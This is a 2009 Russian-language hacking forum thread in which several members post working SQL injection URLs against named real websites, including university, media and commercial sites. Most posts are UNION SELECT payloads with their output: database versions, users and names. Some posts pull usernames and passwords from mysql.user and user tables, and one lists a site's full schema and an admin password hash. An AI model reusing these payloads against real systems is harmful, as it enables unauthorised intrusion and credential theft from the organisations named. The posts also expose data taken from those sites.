HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.06.2009, 22:14
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.dsjcluj.ro/centru-de-presa/albume/poze.php?AlbumID=-12+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),useR(),@@version_compile_os),3,4,5,6,7,8


Database Version: 5.0.81-community-log
Database name: dsjcluj_db
User name: dsjcluj_user@localhost
Os : pc-linux-gnu
 
Ответить с цитированием

  #2  
Старый 06.06.2009, 22:50
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.sc.edu {PR 7} {ТИЦ 400}
Код:
http://www.sc.edu/library/news/index.php?mode=view&id=-252+union+select+1,unhex(hex(user())),3,4,5,6,7,8,9,10,11,12,13/*
version - 4.1.13-log
database - news
user - web@www.sc.edu

mysql.user:
Код:
http://www.sc.edu/library/news/index.php?mode=view&id=-252+union+select+1,unhex(hex(group_concat(user,0x3a,password))),3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*
 
Ответить с цитированием

  #3  
Старый 07.06.2009, 00:34
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://forum.trizland.com/task.php?id=1832+and+substring(version(),1,1)=4


http://pod-ezd.ru/index.php?page=documents&id=-42+UNION+SELECT+1,2,CONCAT(0x7873716C696E6A6265676 96E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,Use r(),0x7873716C696E6A656E64),4,5,6,7,8,9,10,11/*

Database Version: 5.0.42
Database name: pod-ezd
User name: pod-ezd@localhost


Код:
Database [pod-ezd]
    Table [baners  ( Rows)]
        id
        link
        img
        active
    Table [clients  ( Rows)]
        id
        first_name
        middle_name
        last_name
        phone
        email
        city
        organization
        dt
    Table [contacts  ( Rows)]
        id
        img
        body
    Table [documents  ( Rows)]
        id
        title
        body
        dt
        active
        doc_cat_id
        in_arhive
        lang
        file_img
    Table [documents_category  ( Rows)]
        id
        title
    Table [menu  ( Rows)]
        id
        title
        parent_id
        page
        sub_page
        action
        entry_id
        active
        sort
        lang
        href
    Table [mods_net  ( Rows)]
        id
        part
        mod
        square
        size
        price1
        price2
        price3
        price4
        price5
    Table [mods_net_1sm_price  ( Rows)]
        id
        price
    Table [mods_net_doc  ( Rows)]
        id
        doc_id
    Table [modules  ( Rows)]
        id
        mod_name
        parent_id
        sort
        is_on_site
    Table [options  ( Rows)]
        id
        name
        value
    Table [partners  ( Rows)]
        id
        title
        link
        active
        img
    Table [persons  ( Rows)]
        id
        first_name
        middle_name
        last_name
        post
        phone
        active
        img_file
    Table [releases  ( Rows)]
        id
        dt
        file_pdf
        file_img
        text
        active
    Table [user  ( Rows)]
        id
        username
        password
        first_name
        middle_name
        last_name
        email
        phone
        active
        date
Содержание таблицы user:

admin:b717415eb5e699e4989ef3e2c4e9cbf7

1 запись.
 
Ответить с цитированием

  #4  
Старый 07.06.2009, 01:24
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.ohiolearns.org {PR 6}
Код:
http://www.ohiolearns.org/catalog/displaydegree.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
4.0.26-Max:catalog:dbdev@192.168.1.162

table users:
Код:
http://www.ohiolearns.org/catalog/displaydegree.php?id=-1+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users+limit+0,1/*
 
Ответить с цитированием

  #5  
Старый 07.06.2009, 01:34
trefet2
Новичок
Регистрация: 25.05.2009
Сообщений: 5
Провел на форуме:
23792

Репутация: 20
По умолчанию

http://www.westcomp.ru/pricepos.php?id=-1+union+Select+1,2,3,4,concat_ws(0x20,id,fname,mna me,email,password),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29+from+USERLIST _TAB--
 
Ответить с цитированием

  #6  
Старый 07.06.2009, 01:42
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.ces.fau.edu PR 6
Код:
http://www.ces.fau.edu/sfrsf/detail.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
database version - 5.0.51a-3ubuntu5.4
database name - test
user name - sfrsf@localhost
 
Ответить с цитированием

  #7  
Старый 07.06.2009, 08:23
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.coinfo.cefetpb.edu.br/cursos.php?id=1+and+substring(version(),1,1)=5--

##########################################
http://www.unissa.edu.br/website/cursosPosGraduacaoView.php?id=-1+union+select+1,concat_Ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12--

unissa@localhost:unissa:4.0.15-log

Последний раз редактировалось HAXTA4OK; 07.06.2009 в 08:26..
 
Ответить с цитированием

  #8  
Старый 07.06.2009, 08:34
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.ucluj.tv/index.php?VideoID=-612+UNION+SELECT+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8

Database Version: 5.0.81-community-log
Database name: uclujtv_db
User name: uclujtv_user@localhost
Os : pc-linux-gnu
 
Ответить с цитированием

  #9  
Старый 07.06.2009, 09:44
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://doska.alvisp.ru/details.php?id=-1011339+union+select+1,2,3,4,5,6,7,8,9,10,11,conca t_ws(0x3a,user(),database(),version()),13,14,15,16 ,17,18,19+from+mysql.user--

http://doska.alvisp.ru/details.php?id=-1011339+union+select+1,2,3,4,5,6,7,8,9,10,11,file_ priv,13,14,15,16,17,18,19+from+mysql.user--
Y
 
Ответить с цитированием

  #10  
Старый 07.06.2009, 09:47
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.eurotrucks.ro/stoc-camioane-noi.php?TruckCategoryID=6/**/AND/**/SUBSTRING((version),1,1)=x&Action=SetTruckCategoryFilter


Version :5.0.81-community-log
Database : eurotruc_db
User : eurotruc_dbuser@localhost
Os : pc-linux-gnu



http://www.universitateacluj.ro/poze.php?AlbumID=3+AND+SUBSTRING((version()),1,1)=x&pagina=5&subPagina=20

Version : 5.0.81-community-log
Database : universi_db
User : universi_mircea@localhost
Os : pc-linux-gnu
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ